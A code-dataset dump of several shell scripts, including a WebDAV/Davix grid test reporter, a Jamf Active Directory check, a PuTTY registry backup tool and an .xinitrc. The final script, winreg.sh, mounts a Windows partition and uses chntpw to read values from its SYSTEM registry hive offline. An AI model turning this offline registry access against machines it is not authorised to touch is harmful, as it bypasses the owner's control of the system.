-e "s/\${P0PORT}/$2/" \
-e "s/\${CAPORT}/$3/" \
-e "s#\${PEERPEM}#$PP#" \
-e "s#\${CAPEM}#$CP#" \
organizations/ccp-template.yaml | sed -e $'s/\\\\n/\\\n /g'
}
ORG=bankA
P0PORT=7051
CAPORT=7054
PEERPEM=organizations/peerOrganizations/bankA.catena.id/tlsca/tlsca.bankA.catena.id-cert.pem
CAPEM=organizations/peerOrganizations/bankA.catena.id/ca/ca.bankA.catena.id-cert.pem
echo "$(json_ccp $ORG $P0PORT $CAPORT $PEERPEM $CAPEM)" > organizations/peerOrganizations/bankA.catena.id/connection-bankA.json
echo "$(yaml_ccp $ORG $P0PORT $CAPORT $PEERPEM $CAPEM)" > organizations/peerOrganizations/bankA.catena.id/connection-bankA.yaml
ORG=bankB
P0PORT=9051
CAPORT=8054
PEERPEM=organizations/peerOrganizations/bankB.catena.id/tlsca/tlsca.bankB.catena.id-cert.pem
CAPEM=organizations/peerOrganizations/bankB.catena.id/ca/ca.bankB.catena.id-cert.pem
echo "$(json_ccp $ORG $P0PORT $CAPORT $PEERPEM $CAPEM)" > organizations/peerOrganizations/bankB.catena.id/connection-bankB.json
echo "$(yaml_ccp $ORG $P0PORT $CAPORT $PEERPEM $CAPEM)" > organizations/peerOrganizations/bankB.catena.id/connection-bankB.yaml
ORG=gov
P0PORT=10051
CAPORT=10054
PEERPEM=organizations/peerOrganizations/gov.catena.id/tlsca/tlsca.gov.catena.id-cert.pem
CAPEM=organizations/peerOrganizations/gov.catena.id/ca/ca.gov.catena.id-cert.pem
echo "$(json_ccp $ORG $P0PORT $CAPORT $PEERPEM $CAPEM)" > organizations/peerOrganizations/gov.catena.id/connection-gov.json
echo "$(yaml_ccp $ORG $P0PORT $CAPORT $PEERPEM $CAPEM)" > organizations/peerOrganizations/gov.catena.id/connection-gov.yaml
| true |
7962e03190231556172db2ab4d740900c0420927 | Shell | oldpride/tpsup | /scripts/putty_config | UTF-8 | 1,902 | 3.984375 | 4 | [] | no_license | #!/bin/bash
# $USERPROFILE is from windows env variable %USERPROFILE%
file_unresolved='$USERPROFILE/Desktop/putty_config.reg'
usage () {
cat >&2 <<EOF
usage:
$0 export
$0 import
$0 check
putty config is stored in windows registry, therefore, when desktop is rebuilt, (for example,
in citrix environment, desktop is virtual and is moved around without copying over registry),
putty config is lost.
we use this script to export/import putty config into/from a file, which can be backed up.
this script can only be run from cygwin. config is saved to
$file_unresolved,
where \$USERPROFILE is from windows env variable %USERPROFILE%
-c internally call cmd.exe, as "cmd /c regedit ...".
default to run from cygwin directly as "regedit ..."
If you get error "...regedit: permission denied", then you need to run cygwin as
administrator: right click cygwin icon->Run as Administrator.
EOF
exit 1
}
UseCmd=N
while getopts c o;
do
case "$o" in
c) UseCmd=Y;;
#u) id=$OPTARG;;
*) usage;;
esac
done
shift $((OPTIND-1))
if [ $# -ne 1 ]; then
echo "wrong number of args" >&2
usage
fi
action=$1
UNAME=`uname -a`
if ! [[ $UNAME =~ Cygwin ]]; then
echo "ERROR: this script can only be run on Cygwin. current UNAME=$UNAME." >&2
exit 1
fi
eval "file=$file_unresolved"
if [ $action = export ]; then
if [ $UseCmd = Y ]; then
(set -x; cmd /c "regedit /e $file HKEY_CURRENT_USER\\Software\\SimonTatham")
else
(set -x; regedit /e $file HKEY_CURRENT_USER\\Software\\SimonTatham )
fi
elif [ $action = import ]; then
if [ $UseCmd = Y ]; then
(set -x; cmd /c "regedit /i $file")
else
(set -x; regedit /i $file )
fi
elif [ $action = check ]; then
(set -x; ls -l $file )
else
echo "ERROR: unsupported action='$action'" >&2
usage
fi
| true |
200bdb2c5ca5685c81507076d151e9dabb1ac0f4 | Shell | sylvathle/sblunier_webdav | /Monitoring/GenerateGridReport/testFile.sh | UTF-8 | 10,693 | 3.21875 | 3 | [] | no_license | #! /bin/bash
if [ "$1" == "" ]
then
echo argument 1 = cloud or all '(ex: DE)'
exit 1
fi
function getSiteParams {
iterator=0
foundSite=0
while read line
do
if [ $iterator == 3 ];
then
iterator=0
foundSite=0
fi
if [ "$line" == $1 ];
then
foundSite=1
fi
if [ $foundSite == 1 ];
then
if [ $iterator == 1 ];
then
typeStorage=$line
fi
if [ $iterator == 2 ];
then
storageVersion=$line
fi
fi
((iterator=iterator+1))
done < infoSites.txt
}
function RedList {
isInRedList=0
while read list
do
if [ "$list" == $1 ];
then
isInRedList=1
fi
done < redList.txt
}
#proxy=$X509_USER_PROXY
#proxy=${proxy#/tmp/}
#cp $X509_USER_PROXY .
cd testDavix
make
cd ..
http200="HTTP/1.1 200 OK"
ithttp200=0
http400="HTTP/1.1 400 Bad Request"
ithttp400=0
http403a="HTTP/1.1 403 Storage area ATLASDATADISK-FS doesn't support https protocol"
ithttp403a=0
http403b="HTTP/1.1 403 Forbidden"
ithttp403b=0
http404="HTTP/1.1 404 Not Found"
ithttp404=0
http500="HTTP/1.1 500 Internal Server Error"
ithttp500=0
httpFailConnect="curl: (7) couldn't connect to host"
ithttpFailConnect=0
#httpFailConnect="curl: (7)"
httpsslError="curl: (35) SSL connect error"
httptimeout1="Operation timed out"
httptimeout2="connect() timed out"
ithttpsslError=0
totalDatadisks=0
successDatadisks=0
itHasNotWebDAV=0
itHasNoFile=0
davixSuccess=0
ithttptimeout=0
#httpsslError="curl: (35)"
rm Report/testFile.tex
if [[ $1 == 'all' ]]; then
for cloud in $(ls ../Clouds)
do
iterlistfile=0
#cloud="DE"
echo '\subsection{'$cloud$'}\n'>>Report/testFile.tex
while read line
do
((iterlistfile=iterlistfile+1))
if [[ $iterlistfile == 1 ]]; then
datadisk=$line
continue
elif [[ $iterlistfile == 2 ]]; then
iterlistfile=0
fi
((totalDatadisks=totalDatadisks+1))
datadiskforlatex=${datadisk//_/\\_}
result=0
now=$(date +"%d/%m/%y at %T")
RedList $datadisk
if [[ $isInRedList == 1 ]]; then
((itHasNotWebDAV=itHasNotWebDAV+1))
curlOutput="WebDAV not enabled"
mainOutPut="Davix not tested"
result=0
curlColor='red'
elif [[ $line == "empty" ]]; then
echo $line
file='No file found on this datadisk'
((itHasNoFile=itHasNoFile+1))
curlOutput='No file could be tested'
mainOutPut='No file could be tested'
color='red'
curlColor='red'
else
test1=$(curl -LI -m 30 --capath /etc/grid-security/certificates/ --cacert $X509_USER_PROXY --cert $X509_USER_PROXY $line 2>&1)
file=`expr match "$line" '\(.*?\)'`
size=${#file}-1
file=${file:0:$size}
if [[ $test1 =~ "$http200" ]]; then
result=1
((ithttp200=ithttp200+1))
curlOutput=$'good'
curlColor='green'
elif [[ $test1 =~ "$http400" ]]; then
((ithttp400=ithttp400+1))
curlOutput="$http400"
curlColor='red'
elif [[ $test1 =~ "$http403a" ]]; then
((ithttp403a=ithttp403a+1))
curlOutput="$http403a"
curlColor='red'
elif [[ $test1 =~ "$http403b" ]]; then
((ithttp403b=ithttp403b+1))
curlOutput="$http403b"
curlColor='red'
elif [[ $test1 =~ "$http404" ]]; then
((ithttp404=ithttp404+1))
curlOutput="$http404"
curlColor='red'
elif [[ $test1 =~ "$http500" ]]; then
((ithttp500=ithttp500+1))
curlOutput="$http500"
curlColor='red'
elif [[ $test1 =~ "$httpFailConnect" ]]; then
((ithttpFailConnect=ithttpFailConnect+1))
curlOutput="$httpFailConnect"
curlColor='red'
elif [[ $test1 =~ "$httpsslError" ]]; then
((ithttpsslError=ithttpsslError+1))
curlOutput="$httpsslError"
curlColor='red'
elif [[ $test1 =~ "$httptimeout1" ]]; then
((ithttptimeout=ithttptimeout+1))
curlOutput="$httptimeout1"
curlColor='red'
elif [[ $test1 =~ "$httptimeout2" ]]; then
((ithttptimeout=ithttptimeout+1))
curlOutput="$httptimeout2"
curlColor='red'
else
curlOutput="New curl error that has to be identified">>Report/testFile.tex
curlColor='red'
fi
echo $line
if [[ $result == 1 ]]; then
test2=$(./testDavix/main $line)
if [ $? -eq 0 ]; then
mainOutPut="Davix test Ok"
((davixSuccess=davixSuccess+1))
else
mainOutPut="Davix test Failed"
result=0
fi
echo $test2
else
mainOutPut="Davix not tested"
result=0
fi
fi
#fill the report
if [[ $result == 1 ]]; then
color='green'
((successDatadisks=successDatadisks+1))
else
color='red'
fi
getSiteParams $datadisk
echo '\rule{\textwidth}{1pt}'$'\\\\\n'>>Report/testFile.tex
echo '\textcolor{'$color'}{\normalsize{'$datadiskforlatex$'}}\\\\\n'>>Report/testFile.tex
echo 'Storage:' $typeStorage', version: '$storageVersion$'\\\\\n'>>Report/testFile.tex
echo $'File tested:\\\\'>>Report/testFile.tex
echo '\footnotesize{'${file//_/\\_}$'}\\\\\n'>>Report/testFile.tex
echo 'date: '$now$'\\\\\n'>>Report/testFile.tex
echo 'curl output: ' '\textcolor{'$curlColor'}{'$curlOutput$'}\\\\\n'>>Report/testFile.tex
echo 'davix result: ' '\textcolor{'$color'}{'$mainOutPut$'}\\\\\n'>>Report/testFile.tex
#echo '-----------------------------------------------------------'
done < ../Clouds/$cloud/listFilePerSite.txt
done
else
iterlistfile=0
cloud=$1
echo '\subsection{'$cloud$'}\n'>>Report/testFile.tex
while read line
do
((iterlistfile=iterlistfile+1))
if [[ $iterlistfile == 1 ]]; then
datadisk=$line
continue
elif [[ $iterlistfile == 2 ]]; then
iterlistfile=0
fi
((totalDatadisks=totalDatadisks+1))
datadiskforlatex=${datadisk//_/\\_}
result=0
now=$(date +"%d/%m/%y at %T")
#test1=$(curl -LI --capath /etc/grid-security/certificates/ --cacert $X509_USER_PROXY --cert $X509_USER_PROXY $line 2>&1)
RedList $datadisk
if [[ $isInRedList == 1 ]]; then
((itHasNotWebDAV=itHasNotWebDAV+1))
curlOutput="WebDAV not enabled"
mainOutPut="Davix not tested"
result=0
curlColor='red'
elif [[ $line == "empty" ]]; then
echo $line
file='No file found on this datadisk'
((itHasNoFile=itHasNoFile+1))
curlOutput='No file could be tested'
mainOutPut='No file could be tested'
color='red'
curlColor='red'
else
test1=$(curl -LI -m 30 --capath /etc/grid-security/certificates/ --cacert $X509_USER_PROXY --cert $X509_USER_PROXY $line 2>&1)
file=`expr match "$line" '\(.*?\)'`
size=${#file}-1
file=${file:0:$size}
if [[ $test1 =~ "$http200" ]]; then
result=1
((ithttp200=ithttp200+1))
curlOutput=$'good'
curlColor='green'
elif [[ $test1 =~ "$http400" ]]; then
((ithttp400=ithttp400+1))
curlOutput="$http400"
curlColor='red'
elif [[ $test1 =~ "$http403a" ]]; then
((ithttp403a=ithttp403a+1))
curlOutput="$http403a"
curlColor='red'
elif [[ $test1 =~ "$http403b" ]]; then
((ithttp403b=ithttp403b+1))
curlOutput="$http403b"
curlColor='red'
elif [[ $test1 =~ "$http404" ]]; then
((ithttp404=ithttp404+1))
curlOutput="$http404"
curlColor='red'
elif [[ $test1 =~ "$http500" ]]; then
((ithttp500=ithttp500+1))
curlOutput="$http500"
curlColor='red'
elif [[ $test1 =~ "$httpFailConnect" ]]; then
((ithttpFailConnect=ithttpFailConnect+1))
curlOutput="$httpFailConnect"
curlColor='red'
elif [[ $test1 =~ "$httpsslError" ]]; then
((ithttpsslError=ithttpsslError+1))
curlOutput="$httpsslError"
curlColor='red'
elif [[ $test1 =~ "$httptimeout1" ]]; then
((ithttptimeout=ithttptimeout+1))
curlOutput="$httptimeout1"
curlColor='red'
elif [[ $test1 =~ "$httptimeout2" ]]; then
((ithttptimeout=ithttptimeout+1))
curlOutput="$httptimeout2"
curlColor='red'
else
curlOutput="New curl error that has to be identified">>Report/testFile.tex
curlColor='red'
fi
echo $line
if [[ $result == 1 ]]; then
test2=$(./main $line)
if [ $? -eq 0 ]; then
mainOutPut="Davix test Ok"
((davixSuccess=davixSuccess+1))
else
mainOutPut="Davix test Failed"
result=0
fi
else
mainOutPut="Davix not tested"
result=0
fi
fi
#fill the report
if [[ $result == 1 ]]; then
color='green'
((successDatadisks=successDatadisks+1))
else
color='red'
fi
getSiteParams $datadisk
#echo '\rule{\textwidth}{1pt}'$'\\\\\n'
echo '\rule{\textwidth}{1pt}'$'\\\\\n'>>Report/testFile.tex
echo '\textcolor{'$color'}{\normalsize{'$datadiskforlatex$'}}\\\\\n'>>Report/testFile.tex
echo 'Storage:' $typeStorage', version: '$storageVersion$'\\\\\n'>>Report/testFile.tex
echo $'File tested:\\\\'>>Report/testFile.tex
echo '\footnotesize{'${file//_/\\_}$'}\\\\\n'>>Report/testFile.tex
echo 'date: '$now$'\\\\\n'>>Report/testFile.tex
echo 'curl output: ' '\textcolor{'$curlColor'}{'$curlOutput$'}\\\\\n'>>Report/testFile.tex
echo 'davix result: ' '\textcolor{'$color'}{'$mainOutPut$'}\\\\\n'>>Report/testFile.tex
#echo '-----------------------------------------------------------'
done < ../Clouds/$cloud/listFilePerSite.txt
fi
rm Report/testFileCanvas.tex
cd PieChart/curl/
echo $ithttp200 $ithttp403a $ithttp403b $ithttp404 $ithttp500 $ithttpFailConnect $ithttpsslError $itHasNotWebDAV $itHasNoFile $ithttp400 $ithttptimeout
make clean
make
./main $ithttp200 $ithttp403a $ithttp403b $ithttp404 $ithttp500 $ithttpFailConnect $ithttpsslError $itHasNotWebDAV $itHasNoFile $ithttp400 $ithttptimeout
cp canvas.eps ../../Report/Img/curlPiecanvas.eps
cd ../..
echo '\includegraphics[width=\textwidth]{curlPiecanvas.eps}'>>Report/testFileCanvas.tex
((total=ithttp200+ithttp403a+ithttp403b+ithttp404+ithttp500+ithttpFailConnect+ithttpsslError+itHasNotWebDAV+itHasNoFile+ithttp400))
((failedDatadisks=totalDatadisks-davixSuccess))
cd PieChart/davix/
echo $davixSuccess $failedDatadisks
make clean
make
./main $davixSuccess $failedDatadisks
cp canvas.eps ../../Report/Img/davixPiecanvas.eps
cd ../..
echo '\includegraphics[width=\textwidth]{davixPiecanvas.eps}'>>Report/testFileCanvas.tex
cd TimeEvolution/curl
echo $(date +"%d/%m/%y")$'\t'$ithttp200 >>curlsuccess.txt
make clean
make
./main
cp canvas.eps ../../Report/Img/timeEvolutioncanvas.eps
cd ../..
echo '\includegraphics[width=\textwidth]{timeEvolutioncanvas.eps}'>>Report/testFileCanvas.tex
#echo '\includegraphics[width=\textwidth]{../TimeEvolution/davix/canvas.eps}'>>Report/testFileCanvas.tex
| true |
ac6c3f58e237eb8e70ce3331b9be98b4c5987d86 | Shell | wikitongues/Library-of-Congress | /reset.sh | UTF-8 | 319 | 3.296875 | 3 | [] | no_license | #!/bin/bash
dev=false
args=()
while (( $# )); do
case $1 in
-d) dev=true ;;
*) args+=("$1") ;;
esac
shift
done
set -- "${args[@]}"
loc_config='~/loc-config'
if [[ $dev == true ]]; then
loc_config='~/loc-config-dev'
fi
source $loc_config
cd $LOC_PreRelease
rm -rf loc*
loc-test
loc-prepare *
cd loc* | true |
f8696c938e9441b7e9f54bfa1701f7cfc33bf900 | Shell | ryanmoon/public_scripts | /check_ad_jss.sh | UTF-8 | 1,483 | 3.265625 | 3 | [] | no_license | #!/bin/bash
# Variables
apiURL="https://your.jss.com:8443"
apiUser="EA_API_USER"
apiPass="EA_API_PASSWORD"
###### Do not edit below this line
dscacheutil -flushcache
sleep 5
# Check if the computer is on the network by reading its own computer object from AD
# Get Domain from full structure, cut the name and remove space.
ShortDomainName=`dscl /Active\ Directory/ -read . | grep SubNodes | sed 's|SubNodes: ||g'`
computer=$(dsconfigad -show | grep "Computer Account" | awk '{ print $4 }')
dscl /Active\ Directory/$ShortDomainName/All\ Domains -read /Computers/$computer RecordName &>/dev/null
if [ ! $? == 0 ] ; then
result="No connection to the domain"
exit 1
else
result="Connected to $ShortDomainName"
fi
# Upload result of AD connection test
echo "<computer>" > /private/tmp/EA.xml
echo " <extension_attributes>" >> /private/tmp/EA.xml
echo " <extension_attribute>" >> /private/tmp/EA.xml
echo " <name>AD Connection Status</name>" >> /private/tmp/EA.xml
echo " <value>$result</value>" >> /private/tmp/EA.xml
echo " </extension_attribute>" >> /private/tmp/EA.xml
echo " </extension_attributes>" >> /private/tmp/EA.xml
echo "</computer>" >> /private/tmp/EA.xml
serial=$(system_profiler SPHardwareDataType | grep 'Serial Number (system)' | awk '{print $NF}')
echo $serial
curl -sfku $apiUser:$apiPass $apiURL/JSSResource/computers/serialnumber/$serial/subset/extensionattributes -T /private/tmp/EA.xml -X PUT
sleep 5
#rm /private/tmp/EA.xml
exit 0
| true |
db748fe363c7ad4ba3a74ae00a254fc0406a4980 | Shell | wangwangwar/bakfile | /.xinitrc | UTF-8 | 1,882 | 2.796875 | 3 | [] | no_license | #!/bin/bash
# Taken from:
# https://raw.github.com/kaihendry/Kai-s--HOME/master/.xinitrc
#
# for terminus font in Archlinux :(
xset +fp /usr/share/fonts/TTF
xset +fp /usr/share/fonts/wenquanyi/wqy-microhei
xset fp rehash
xset -b # disable bell
eval `/usr/bin/ssh-agent`
if test -f /usr/lib/openssh/x11-ssh-askpass # Archlinux
then
SSH_ASKPASS=/usr/lib/openssh/x11-ssh-askpass ssh-add < /dev/null
fi
if test -f /usr/lib/ssh/x11-ssh-askpass # Debian
then
SSH_ASKPASS=/usr/lib/ssh/x11-ssh-askpass ssh-add < /dev/null
fi
# 1280x720 = 720p X220
hash fswebcam && fswebcam -q --no-banner -r 1280x720 ~/private/login-photos/$(date +%Y-%m-%dT%H).jpg &
xrdb -merge $HOME/.Xresources
xmodmap ~/.Xmodmap
#setxkbmap -layout gb -option ctrl:nocaps
# input
X_ENV="dwm"
export LANG=zh_CN.UTF-8
#export LC_ALL="zh_CN.UTF-8"
#export XIM=ibus
#export XIM_PROGRAM="ibus-daemon"
export GTK_IM_MODULE=fcitx
export QT_IM_MODULE=fcitx
export XMODIFIERS="@im=fcitx"
#export XIM_ARGS="--daemonize --xim"
fcitx -r
# ibus
#export GTK_IM_MODULE=ibus
#export QT_IM_MODULE=ibus
#export XIM=fcitx
#export XIM_PROGRAM=fcitx
#export XMODIFIERS=@im=ibus
#ibus-daemon -x -d
#while true
#do
# VOL=$(amixer get Master | tail -1 | sed 's/.*\[\([0-9]*%\)\].*/\1/')
# LOCALTIME=$(date +%Z\=%Y-%m-%dT%H:%M)
# IP=$(for i in `ip r`; do echo $i; done | grep -A 1 src | tail -n1) # can get confused if you use vmware
# TEMP="$(($(cat /sys/class/thermal/thermal_zone0/temp) / 1000))C"
#
# if acpi -a | grep off-line > /dev/null
# then
# BAT="Bat. $(acpi -b | awk '{ print $4 " " $5 }' | tr -d ',')"
# xsetroot -name "$IP $BAT $VOL $TEMP $LOCALTIME"
# else
# xsetroot -name "$IP $VOL $TEMP $LOCALTIME"
# fi
# sleep 20s
#done &
while true
do
LOCALTIME=$(date +%Z\=%m-%dT%H:%M)
xsetroot -name "$LOCALTIME"
sleep 20s
done &
conky | while read -r; do xsetroot -name "$REPLY"; done &
exec dwm
#exec awesome
| true |
fe7103b0a74145aeea063a3f8b91ce1f5999ae84 | Shell | sweshelo/winreg | /winreg.sh | UTF-8 | 1,082 | 3.640625 | 4 | [] | no_license | #!/bin/bash
function getSystemDrive () {
umount /mnt/Windows
disk=$1
# Search C Drive
part=(`fdisk -l "${disk}" | grep -o "${disk}[0-9]"`)
targ=""
for d in ${part[@]};do
if [ -d "/mnt/Widnwos" ]; then
mkdir /mnt/Windows
fi
ntfs-3g $d /mnt/Windows
if [ -e "/mnt/Windows/Windows/System32/config/SYSTEM" ]; then
ls /mnt/Windows
targ=$d
fi
if [ $targ ]; then
break;
else
umount /mnt/Windows
fi
done
if [ $targ ]; then
return `echo $targ|grep -o '[0-9]'`
fi
return 0
}
# Get Machine Name
function getRegistryValue () {
KEYTYPE=$1
KEYNAME=$2
expect -c "
spawn env LANG=C /usr/sbin/chntpw -e /mnt/Windows/Windows/System32/config/${KEYTYPE}
set timeout 2
expect \"^> \"
send \"cat ${KEYNAME}\n\"
expect \"$\"
exit 0
" > /var/log/reg.log & wait
name=`cat /var/log/reg.log | sed -e '/^.\{0,2\}$/d'|tail -n 1`
echo $name
}
| true |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.